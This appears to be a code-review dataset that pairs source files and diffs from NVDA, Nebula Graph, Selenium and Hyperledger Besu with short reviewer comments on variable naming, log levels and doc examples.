if pbConf["progressBarOutputMode"] in ("beep", "both") and (pbConf["reportBackgroundProgressBars"] or self.IsActive()): tones.beep(1760, 40) self.Hide() self.Destroy() def shouldConfigProfileTriggersBeSuspended(): """Determine whether configuration profile triggers should be suspended in relation to NVDA's GUI. For NVDA configuration dialogs, the configuration should remain the same as it was before the GUI was popped up so the user can change settings in the correct profile. Top-level windows that require this behavior should have a C{shouldSuspendConfigProfileTriggers} attribute set to C{True}. Because these dialogs are often opened via the NVDA menu, this applies to the NVDA menu as well. """ if winUser.getGUIThreadInfo(ctypes.windll.kernel32.GetCurrentThreadId()).flags & 0x00000010: # The NVDA menu is active. return True for window in wx.GetTopLevelWindows(): if window.IsShown() and getattr(window, "shouldSuspendConfigProfileTriggers", False): return True return False class NonReEntrantTimer(wx.Timer): """ Before WXPython 4, wx.Timer was nonre-entrant, meaning that if code within its callback pumped messages (E.g. called wx.Yield) and this timer was ready to fire again, the timer would not fire until the first callback had completed. However, in WXPython 4, wx.Timer is now re-entrant. Code in NVDA is not written to handle re-entrant timers, so this class provides a Timer with the old behaviour. This should be used in place of wx.Timer and wx.PyTimer where the callback will directly or indirectly call wx.Yield or some how process the Windows window message queue. For example, NVDA's core pump or other timers that run in NVDA's main thread. Timers on braille display drivers for key detection don't need to use this as they only queue gestures rather than actually executing them. """ def __init__(self, run=None): if run is not None: self.run = run self._inNotify = False super(NonReEntrantTimer,self).__init__() def run(self): """Subclasses can override or specify in constructor. """ raise NotImplementedError def Notify(self): if self._inNotify: return self._inNotify = True try: self.run() finally: self._inNotify = False def _isDebug(): return config.conf["debugLog"]["gui"] class AskAllowUsageStatsDialog( _ContextHelpMixin, wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO ): """A dialog asking if the user wishes to allow NVDA usage stats to be collected by NV Access.""" helpId = "UsageStatsDialog" def __init__(self, parent): # Translators: The title of the dialog asking if usage data can be collected super().__init__(parent, title=_("NVDA Usage Data Collection")) mainSizer = wx.BoxSizer(wx.VERTICAL) sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL) # Translators: A message asking the user if they want to allow usage stats gathering message=_("In order to improve NVDA in the future, NV Access wishes to collect usage data from running copies of NVDA.\n\n" "Data includes Operating System version, NVDA version, language, country of origin, plus certain NVDA configuration such as current synthesizer, braille display and braille table. " "No spoken or braille content will be ever sent to NV Access. Please refer to the User Guide for a current list of all data collected.\n\n" "Do you wish to allow NV Access to periodically collect this data in order to improve NVDA?") sText=sHelper.addItem(wx.StaticText(self, label=message)) # the wx.Window must be constructed before we can get the handle. import windowUtils self.scaleFactor = windowUtils.getWindowScalingFactor(self.GetHandle()) sText.Wrap(self.scaleFactor*600) # 600 was fairly arbitrarily chosen by a visual user to look acceptable on their machine. bHelper = sHelper.addDialogDismissButtons(guiHelper.ButtonHelper(wx.HORIZONTAL)) # Translators: The label of a Yes button in a dialog yesButton = bHelper.addButton(self, wx.ID_YES, label=_("&Yes")) yesButton.Bind(wx.EVT_BUTTON, self.onYesButton) # Translators: The label of a No button in a dialog noButton = bHelper.addButton(self, wx.ID_NO, label=_("&No")) noButton.Bind(wx.EVT_BUTTON, self.onNoButton) # Translators: The label of a button to remind the user later about performing some action. remindMeButton = bHelper.addButton(self, wx.ID_CANCEL, label=_("Remind me &later")) remindMeButton.Bind(wx.EVT_BUTTON, self.onLaterButton) remindMeButton.SetFocus() mainSizer.Add(sHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) self.Sizer = mainSizer mainSizer.Fit(self) self.Center(wx.BOTH | wx.CENTER_ON_SCREEN) def onYesButton(self,evt): log.debug("Usage stats gathering has been allowed") config.conf['update']['askedAllowUsageStats']=True config.conf['update']['allowUsageStats']=True self.EndModal(wx.ID_YES) def onNoButton(self,evt): log.debug("Usage stats gathering has been disallowed") config.conf['update']['askedAllowUsageStats']=True config.conf['update']['allowUsageStats']=False self.EndModal(wx.ID_NO) def onLaterButton(self,evt): log.debug("Usage stats gathering question has been deferred") # evt.Skip() is called since wx.ID_CANCEL is used as the ID for the Ask Later button, # wx automatically ends the modal itself. evt.Skip()
1
31,917
What if `wxLang` is returned `None` from `getWxLang`
nvaccess-nvda
py
@@ -546,9 +546,9 @@ ResultCode NebulaStore::ingest(GraphSpaceID spaceId) { auto files = nebula::fs::FileUtils::listAllFilesInDir(path.c_str(), true, "*.sst"); for (auto file : files) { LOG(INFO) << "Ingesting extra file: " << file; - auto code = engine->ingest(std::vector<std::string>({file})); - if (code != ResultCode::SUCCEEDED) { - return code; + auto ret_code = engine->ingest(std::vector<std::string>({file})); + if (ResultCode::SUCCEEDED != ret_code) { + return ret_code; } } }
1
/* Copyright (c) 2018 vesoft inc. All rights reserved. * * This source code is licensed under Apache 2.0 License, * attached with Common Clause Condition 1.0, found in the LICENSES directory. */ #include "base/Base.h" #include "kvstore/NebulaStore.h" #include <folly/Likely.h> #include <algorithm> #include <cstdint> #include "network/NetworkUtils.h" #include "fs/FileUtils.h" #include "kvstore/RocksEngine.h" #include "kvstore/SnapshotManagerImpl.h" DEFINE_string(engine_type, "rocksdb", "rocksdb, memory..."); DEFINE_int32(custom_filter_interval_secs, 24 * 3600, "interval to trigger custom compaction"); DEFINE_int32(num_workers, 4, "Number of worker threads"); DEFINE_bool(check_leader, true, "Check leader or not"); namespace nebula { namespace kvstore { NebulaStore::~NebulaStore() { LOG(INFO) << "Cut off the relationship with meta client"; options_.partMan_.reset(); LOG(INFO) << "Stop the raft service..."; raftService_->stop(); LOG(INFO) << "Waiting for the raft service stop..."; raftService_->waitUntilStop(); spaces_.clear(); bgWorkers_->stop(); bgWorkers_->wait(); LOG(INFO) << "~NebulaStore()"; } bool NebulaStore::init() { LOG(INFO) << "Start the raft service..."; bgWorkers_ = std::make_shared<thread::GenericThreadPool>(); bgWorkers_->start(FLAGS_num_workers, "nebula-bgworkers"); snapshot_.reset(new SnapshotManagerImpl(this)); raftService_ = raftex::RaftexService::createService(ioPool_, workers_, raftAddr_.second); if (!raftService_->start()) { LOG(ERROR) << "Start the raft service failed"; return false; } CHECK(!!options_.partMan_); LOG(INFO) << "Scan the local path, and init the spaces_"; { for (auto& path : options_.dataPaths_) { auto rootPath = folly::stringPrintf("%s/nebula", path.c_str()); auto dirs = fs::FileUtils::listAllDirsInDir(rootPath.c_str()); for (auto& dir : dirs) { LOG(INFO) << "Scan path \"" << path << "/" << dir << "\""; try { GraphSpaceID spaceId; try { spaceId = folly::to<GraphSpaceID>(dir); } catch (const std::exception& ex) { LOG(ERROR) << "Data path invalid: " << ex.what(); return false; } if (!options_.partMan_->spaceExist(storeSvcAddr_, spaceId).ok()) { // TODO We might want to have a second thought here. // Removing the data directly feels a little strong LOG(INFO) << "Space " << spaceId << " does not exist any more, remove the data!"; auto dataPath = folly::stringPrintf("%s/%s", rootPath.c_str(), dir.c_str()); CHECK(fs::FileUtils::remove(dataPath.c_str(), true)); continue; } KVEngine* enginePtr = nullptr; { folly::RWSpinLock::WriteHolder wh(&lock_); auto engine = newEngine(spaceId, path); auto spaceIt = this->spaces_.find(spaceId); if (spaceIt == this->spaces_.end()) { LOG(INFO) << "Load space " << spaceId << " from disk"; spaceIt = this->spaces_.emplace( spaceId, std::make_unique<SpacePartInfo>()).first; } spaceIt->second->engines_.emplace_back(std::move(engine)); enginePtr = spaceIt->second->engines_.back().get(); } // partIds is the partition in this host waiting to open std::vector<PartitionID> partIds; for (auto& partId : enginePtr->allParts()) { if (!options_.partMan_->partExist(storeSvcAddr_, spaceId, partId).ok()) { LOG(INFO) << "Part " << partId << " does not exist any more, remove it!"; enginePtr->removePart(partId); continue; } else { partIds.emplace_back(partId); } } if (partIds.empty()) { continue; } std::atomic<size_t> counter(partIds.size()); folly::Baton<true, std::atomic> baton; LOG(INFO) << "Need to open " << partIds.size() << " parts of space " << spaceId; for (auto& partId : partIds) { bgWorkers_->addTask([ spaceId, partId, enginePtr, &counter, &baton, this] () mutable { auto part = std::make_shared<Part>(spaceId, partId, raftAddr_, folly::stringPrintf("%s/wal/%d", enginePtr->getDataRoot(), partId), enginePtr, ioPool_, bgWorkers_, workers_, snapshot_); auto status = options_.partMan_->partMeta(spaceId, partId); if (!status.ok()) { LOG(WARNING) << status.status().toString(); return; } auto partMeta = status.value(); std::vector<HostAddr> peers; for (auto& h : partMeta.peers_) { if (h != storeSvcAddr_) { peers.emplace_back(getRaftAddr(h)); VLOG(1) << "Add peer " << peers.back(); } } raftService_->addPartition(part); part->start(std::move(peers), false); LOG(INFO) << "Load part " << spaceId << ", " << partId << " from disk"; { folly::RWSpinLock::WriteHolder holder(&lock_); auto iter = spaces_.find(spaceId); CHECK(iter != spaces_.end()); iter->second->parts_.emplace(partId, part); } counter.fetch_sub(1); if (counter.load() == 0) { baton.post(); } }); } baton.wait(); LOG(INFO) << "Load space " << spaceId << " complete"; } catch (std::exception& e) { LOG(FATAL) << "Invalid data directory \"" << dir << "\""; } } } } LOG(INFO) << "Init data from partManager for " << storeSvcAddr_; auto partsMap = options_.partMan_->parts(storeSvcAddr_); for (auto& entry : partsMap) { auto spaceId = entry.first; addSpace(spaceId); std::vector<PartitionID> partIds; for (auto it = entry.second.begin(); it != entry.second.end(); it++) { partIds.emplace_back(it->first); } std::sort(partIds.begin(), partIds.end()); for (auto& partId : partIds) { addPart(spaceId, partId, false); } } LOG(INFO) << "Register handler..."; options_.partMan_->registerHandler(this); return true; } std::unique_ptr<KVEngine> NebulaStore::newEngine(GraphSpaceID spaceId, const std::string& path) { if (FLAGS_engine_type == "rocksdb") { std::shared_ptr<KVCompactionFilterFactory> cfFactory = nullptr; if (options_.cffBuilder_ != nullptr) { cfFactory = options_.cffBuilder_->buildCfFactory(spaceId, FLAGS_custom_filter_interval_secs); } return std::make_unique<RocksEngine>(spaceId, path, options_.mergeOp_, cfFactory); } else { LOG(FATAL) << "Unknown engine type " << FLAGS_engine_type; return nullptr; } } ErrorOr<ResultCode, HostAddr> NebulaStore::partLeader(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } auto& parts = it->second->parts_; auto partIt = parts.find(partId); if (UNLIKELY(partIt == parts.end())) { return ResultCode::ERR_PART_NOT_FOUND; } return getStoreAddr(partIt->second->leader()); } void NebulaStore::addSpace(GraphSpaceID spaceId) { folly::RWSpinLock::WriteHolder wh(&lock_); if (this->spaces_.find(spaceId) != this->spaces_.end()) { LOG(INFO) << "Space " << spaceId << " has existed!"; return; } LOG(INFO) << "Create space " << spaceId; this->spaces_[spaceId] = std::make_unique<SpacePartInfo>(); for (auto& path : options_.dataPaths_) { this->spaces_[spaceId]->engines_.emplace_back(newEngine(spaceId, path)); } } void NebulaStore::addPart(GraphSpaceID spaceId, PartitionID partId, bool asLearner) { folly::RWSpinLock::WriteHolder wh(&lock_); auto spaceIt = this->spaces_.find(spaceId); CHECK(spaceIt != this->spaces_.end()) << "Space should exist!"; if (spaceIt->second->parts_.find(partId) != spaceIt->second->parts_.end()) { LOG(INFO) << "[" << spaceId << "," << partId << "] has existed!"; return; } int32_t minIndex = -1; int32_t index = 0; int32_t minPartsNum = 0x7FFFFFFF; auto& engines = spaceIt->second->engines_; for (auto& engine : engines) { if (engine->totalPartsNum() < minPartsNum) { minPartsNum = engine->totalPartsNum(); minIndex = index; } index++; } CHECK_GE(minIndex, 0) << "engines number:" << engines.size(); const auto& targetEngine = engines[minIndex]; // Write the information into related engine. targetEngine->addPart(partId); spaceIt->second->parts_.emplace( partId, newPart(spaceId, partId, targetEngine.get(), asLearner)); LOG(INFO) << "Space " << spaceId << ", part " << partId << " has been added, asLearner " << asLearner; } std::shared_ptr<Part> NebulaStore::newPart(GraphSpaceID spaceId, PartitionID partId, KVEngine* engine, bool asLearner) { auto part = std::make_shared<Part>(spaceId, partId, raftAddr_, folly::stringPrintf("%s/wal/%d", engine->getDataRoot(), partId), engine, ioPool_, bgWorkers_, workers_, snapshot_); auto metaStatus = options_.partMan_->partMeta(spaceId, partId); if (!metaStatus.ok()) { return nullptr; } auto partMeta = metaStatus.value(); std::vector<HostAddr> peers; for (auto& h : partMeta.peers_) { if (h != storeSvcAddr_) { peers.emplace_back(getRaftAddr(h)); VLOG(1) << "Add peer " << peers.back(); } } raftService_->addPartition(part); part->start(std::move(peers), asLearner); return part; } void NebulaStore::removeSpace(GraphSpaceID spaceId) { folly::RWSpinLock::WriteHolder wh(&lock_); auto spaceIt = this->spaces_.find(spaceId); auto& engines = spaceIt->second->engines_; for (auto& engine : engines) { auto parts = engine->allParts(); for (auto& partId : parts) { engine->removePart(partId); } CHECK_EQ(0, engine->totalPartsNum()); } this->spaces_.erase(spaceIt); // TODO(dangleptr): Should we delete the data? LOG(INFO) << "Space " << spaceId << " has been removed!"; } void NebulaStore::removePart(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::WriteHolder wh(&lock_); auto spaceIt = this->spaces_.find(spaceId); if (spaceIt != this->spaces_.end()) { auto partIt = spaceIt->second->parts_.find(partId); if (partIt != spaceIt->second->parts_.end()) { auto* e = partIt->second->engine(); CHECK_NOTNULL(e); raftService_->removePartition(partIt->second); partIt->second->reset(); spaceIt->second->parts_.erase(partId); e->removePart(partId); } } LOG(INFO) << "Space " << spaceId << ", part " << partId << " has been removed!"; } void NebulaStore::updateSpaceOption(GraphSpaceID spaceId, const std::unordered_map<std::string, std::string>& options, bool isDbOption) { if (isDbOption) { for (const auto& kv : options) { setDBOption(spaceId, kv.first, kv.second); } } else { for (const auto& kv : options) { setOption(spaceId, kv.first, kv.second); } } } ResultCode NebulaStore::get(GraphSpaceID spaceId, PartitionID partId, const std::string& key, std::string* value) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->get(key, value); } ResultCode NebulaStore::multiGet(GraphSpaceID spaceId, PartitionID partId, const std::vector<std::string>& keys, std::vector<std::string>* values) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->multiGet(keys, values); } ResultCode NebulaStore::range(GraphSpaceID spaceId, PartitionID partId, const std::string& start, const std::string& end, std::unique_ptr<KVIterator>* iter) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->range(start, end, iter); } ResultCode NebulaStore::prefix(GraphSpaceID spaceId, PartitionID partId, const std::string& prefix, std::unique_ptr<KVIterator>* iter) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->prefix(prefix, iter); } ResultCode NebulaStore::rangeWithPrefix(GraphSpaceID spaceId, PartitionID partId, const std::string& start, const std::string& prefix, std::unique_ptr<KVIterator>* iter) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->rangeWithPrefix(start, prefix, iter); } void NebulaStore::asyncMultiPut(GraphSpaceID spaceId, PartitionID partId, std::vector<KV> keyValues, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncMultiPut(std::move(keyValues), std::move(cb)); } void NebulaStore::asyncRemove(GraphSpaceID spaceId, PartitionID partId, const std::string& key, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncRemove(key, std::move(cb)); } void NebulaStore::asyncMultiRemove(GraphSpaceID spaceId, PartitionID partId, std::vector<std::string> keys, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncMultiRemove(std::move(keys), std::move(cb)); } void NebulaStore::asyncRemoveRange(GraphSpaceID spaceId, PartitionID partId, const std::string& start, const std::string& end, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncRemoveRange(start, end, std::move(cb)); } void NebulaStore::asyncRemovePrefix(GraphSpaceID spaceId, PartitionID partId, const std::string& prefix, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncRemovePrefix(prefix, std::move(cb)); } void NebulaStore::asyncAtomicOp(GraphSpaceID spaceId, PartitionID partId, raftex::AtomicOp op, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncAtomicOp(std::move(op), std::move(cb)); } ErrorOr<ResultCode, std::shared_ptr<Part>> NebulaStore::part(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } auto& parts = it->second->parts_; auto partIt = parts.find(partId); if (UNLIKELY(partIt == parts.end())) { return ResultCode::ERR_PART_NOT_FOUND; } return partIt->second; } ResultCode NebulaStore::ingest(GraphSpaceID spaceId) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto parts = engine->allParts(); for (auto part : parts) { auto ret = this->engine(spaceId, part); if (!ok(ret)) { return error(ret); } auto path = folly::stringPrintf("%s/download/%d", value(ret)->getDataRoot(), part); if (!fs::FileUtils::exist(path)) { LOG(INFO) << path << " not existed"; continue; } auto files = nebula::fs::FileUtils::listAllFilesInDir(path.c_str(), true, "*.sst"); for (auto file : files) { LOG(INFO) << "Ingesting extra file: " << file; auto code = engine->ingest(std::vector<std::string>({file})); if (code != ResultCode::SUCCEEDED) { return code; } } } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::setOption(GraphSpaceID spaceId, const std::string& configKey, const std::string& configValue) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->setOption(configKey, configValue); if (code != ResultCode::SUCCEEDED) { return code; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::setDBOption(GraphSpaceID spaceId, const std::string& configKey, const std::string& configValue) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->setDBOption(configKey, configValue); if (code != ResultCode::SUCCEEDED) { return code; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::compact(GraphSpaceID spaceId) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); auto code = ResultCode::SUCCEEDED; std::vector<std::thread> threads; for (auto& engine : space->engines_) { threads.emplace_back(std::thread([&engine, &code] { auto ret = engine->compact(); if (ret != ResultCode::SUCCEEDED) { code = ret; } })); } // Wait for all threads to finish for (auto& t : threads) { t.join(); } return code; } ResultCode NebulaStore::flush(GraphSpaceID spaceId) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->flush(); if (code != ResultCode::SUCCEEDED) { return code; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::createCheckpoint(GraphSpaceID spaceId, const std::string& name) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->createCheckpoint(name); if (code != ResultCode::SUCCEEDED) { return code; } // create wal hard link for all parts auto parts = engine->allParts(); for (auto& part : parts) { auto ret = this->part(spaceId, part); if (!ok(ret)) { LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part; return error(ret); } auto walPath = folly::stringPrintf("%s/checkpoints/%s/wal/%d", engine->getDataRoot(), name.c_str(), part); auto p = nebula::value(ret); if (!p->linkCurrentWAL(walPath.data())) { return ResultCode::ERR_CHECKPOINT_ERROR; } } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::dropCheckpoint(GraphSpaceID spaceId, const std::string& name) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { /** * Drop checkpoint and wal together **/ auto checkpointPath = folly::stringPrintf("%s/checkpoints/%s", engine->getDataRoot(), name.c_str()); LOG(INFO) << "Drop checkpoint : " << checkpointPath; if (!fs::FileUtils::exist(checkpointPath)) { continue; } if (!fs::FileUtils::remove(checkpointPath.data(), true)) { LOG(ERROR) << "Drop checkpoint dir failed : " << checkpointPath; return ResultCode::ERR_IO_ERROR; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::setWriteBlocking(GraphSpaceID spaceId, bool sign) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto parts = engine->allParts(); for (auto& part : parts) { auto partRet = this->part(spaceId, part); if (!ok(partRet)) { LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part; return error(partRet); } auto p = nebula::value(partRet); if (p->isLeader()) { auto ret = ResultCode::SUCCEEDED; p->setBlocking(sign); if (sign) { folly::Baton<true, std::atomic> baton; p->sync([&ret, &baton] (kvstore::ResultCode code) { if (kvstore::ResultCode::SUCCEEDED != code) { ret = code; } baton.post(); }); baton.wait(); } if (ret != ResultCode::SUCCEEDED) { LOG(ERROR) << "Part sync failed. space : " << spaceId << " Part : " << part; return ret; } } } } return ResultCode::SUCCEEDED; } bool NebulaStore::isLeader(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto spaceIt = spaces_.find(spaceId); if (spaceIt != this->spaces_.end()) { auto partIt = spaceIt->second->parts_.find(partId); if (partIt != spaceIt->second->parts_.end()) { return partIt->second->isLeader(); } else { return false; } } return false; } ErrorOr<ResultCode, KVEngine*> NebulaStore::engine(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } auto& parts = it->second->parts_; auto partIt = parts.find(partId); if (UNLIKELY(partIt == parts.end())) { return ResultCode::ERR_PART_NOT_FOUND; } return partIt->second->engine(); } ErrorOr<ResultCode, std::shared_ptr<SpacePartInfo>> NebulaStore::space(GraphSpaceID spaceId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } return it->second; } int32_t NebulaStore::allLeader(std::unordered_map<GraphSpaceID, std::vector<PartitionID>>& leaderIds) { folly::RWSpinLock::ReadHolder rh(&lock_); int32_t count = 0; for (const auto& spaceIt : spaces_) { auto spaceId = spaceIt.first; for (const auto& partIt : spaceIt.second->parts_) { auto partId = partIt.first; if (partIt.second->isLeader()) { leaderIds[spaceId].emplace_back(partId); ++count; } } } return count; } bool NebulaStore::checkLeader(std::shared_ptr<Part> part) const { return !FLAGS_check_leader || part->isLeader(); } } // namespace kvstore } // namespace nebula
1
27,579
Please don't do changing like this unless it _**really**_ cares. BTW. Please look around to infer our naming conventions.
vesoft-inc-nebula
cpp
@@ -35,13 +35,13 @@ public class BaseSuite { public static ExternalResource testEnvironment = new ExternalResource() { @Override protected void before() { - log.info("Preparing test environment"); + log.finest("Preparing test environment"); GlobalTestEnvironment.get(SeleniumTestEnvironment.class); System.setProperty("webdriver.remote.shorten_log_messages", "true"); } @Override protected void after() { - log.info("Cleaning test environment"); + log.finest("Cleaning test environment"); TestEnvironment environment = GlobalTestEnvironment.get(); if (environment != null) { environment.stop();
1
// Licensed to the Software Freedom Conservancy (SFC) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The SFC licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package com.thoughtworks.selenium; import com.thoughtworks.selenium.testing.SeleniumTestEnvironment; import org.junit.ClassRule; import org.junit.rules.ExternalResource; import org.junit.rules.RuleChain; import org.junit.rules.TestRule; import org.openqa.selenium.environment.GlobalTestEnvironment; import org.openqa.selenium.environment.TestEnvironment; import java.util.logging.Logger; public class BaseSuite { private static final Logger log = Logger.getLogger(BaseSuite.class.getName()); public static ExternalResource testEnvironment = new ExternalResource() { @Override protected void before() { log.info("Preparing test environment"); GlobalTestEnvironment.get(SeleniumTestEnvironment.class); System.setProperty("webdriver.remote.shorten_log_messages", "true"); } @Override protected void after() { log.info("Cleaning test environment"); TestEnvironment environment = GlobalTestEnvironment.get(); if (environment != null) { environment.stop(); GlobalTestEnvironment.set(null); } } }; public static ExternalResource browser = new ExternalResource() { @Override protected void after() { log.info("Stopping browser"); try { InternalSelenseTestBase.destroyDriver(); } catch (SeleniumException ignored) { // Nothing sane to do } } }; @ClassRule public static TestRule chain = RuleChain.outerRule(testEnvironment).around(browser); }
1
16,446
This is in test code: understanding what we're doing is important in this context.
SeleniumHQ-selenium
py
@@ -76,8 +76,8 @@ public class CommandLineUtils { * @param isMainOptionCondition the conditions to test dependent options against. If all * conditions are true, dependent options will be checked. * @param dependentOptionsNames a list of option names that can't be used if condition is met. - * Example: if --min-gas-price is in the list and condition is that either --miner-enabled or - * --goquorum-compatibility-enabled should not be false, we log a warning. + * Example: if --min-gas-price is in the list and condition is that --miner-enabled should not + * be false, we log a warning. */ public static void checkMultiOptionDependencies( final Logger logger,
1
/* * Copyright ConsenSys AG. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ package org.hyperledger.besu.cli.util; import org.hyperledger.besu.util.StringUtils; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; import org.apache.logging.log4j.Logger; import picocli.CommandLine; public class CommandLineUtils { public static final String DEPENDENCY_WARNING_MSG = "{} has been ignored because {} was not defined on the command line."; public static final String MULTI_DEPENDENCY_WARNING_MSG = "{} ignored because none of {} was defined."; /** * Check if options are passed that require an option to be true to have any effect and log a * warning with the list of affected options. * * <p>Note that in future version of PicoCLI some options dependency mechanism may be implemented * that could replace this. See https://github.com/remkop/picocli/issues/295 * * @param logger the logger instance used to log the warning * @param commandLine the command line containing the options we want to check * @param mainOptionName the name of the main option to test dependency against. Only used for * display. * @param isMainOptionCondition the condition to test the options dependencies, if true will test * if not won't * @param dependentOptionsNames a list of option names that can't be used if condition is met. * Example: if --miner-coinbase is in the list and condition is that --miner-enabled should * not be false, we log a warning. */ public static void checkOptionDependencies( final Logger logger, final CommandLine commandLine, final String mainOptionName, final boolean isMainOptionCondition, final List<String> dependentOptionsNames) { if (isMainOptionCondition) { final String affectedOptions = getAffectedOptions(commandLine, dependentOptionsNames); if (!affectedOptions.isEmpty()) { logger.warn(DEPENDENCY_WARNING_MSG, affectedOptions, mainOptionName); } } } /** * Check if options are passed that require an option to be true to have any effect and log a * warning with the list of affected options. Multiple main options may be passed to check * dependencies against. * * <p>Note that in future version of PicoCLI some options dependency mechanism may be implemented * that could replace this. See https://github.com/remkop/picocli/issues/295 * * @param logger the logger instance used to log the warning * @param commandLine the command line containing the options we want to check * @param mainOptions the names of the main options to test dependency against. Only used for * display. * @param isMainOptionCondition the conditions to test dependent options against. If all * conditions are true, dependent options will be checked. * @param dependentOptionsNames a list of option names that can't be used if condition is met. * Example: if --min-gas-price is in the list and condition is that either --miner-enabled or * --goquorum-compatibility-enabled should not be false, we log a warning. */ public static void checkMultiOptionDependencies( final Logger logger, final CommandLine commandLine, final List<String> mainOptions, final List<Boolean> isMainOptionCondition, final List<String> dependentOptionsNames) { if (isMainOptionCondition.stream().allMatch(isTrue -> isTrue)) { final String affectedOptions = getAffectedOptions(commandLine, dependentOptionsNames); if (!affectedOptions.isEmpty()) { final String joinedMainOptions = StringUtils.joiningWithLastDelimiter(", ", " or ").apply(mainOptions); logger.warn(MULTI_DEPENDENCY_WARNING_MSG, affectedOptions, joinedMainOptions); } } } private static String getAffectedOptions( final CommandLine commandLine, final List<String> dependentOptionsNames) { return commandLine.getCommandSpec().options().stream() .filter( option -> Arrays.stream(option.names()).anyMatch(dependentOptionsNames::contains) && !option.stringValues().isEmpty()) .map(option -> option.names()[0]) .collect( Collectors.collectingAndThen( Collectors.toList(), StringUtils.joiningWithLastDelimiter(", ", " and "))); } }
1
25,465
prob should still have an example that has multiple option names even if you have to make it up. Or maybe we don't need this method?
hyperledger-besu
java
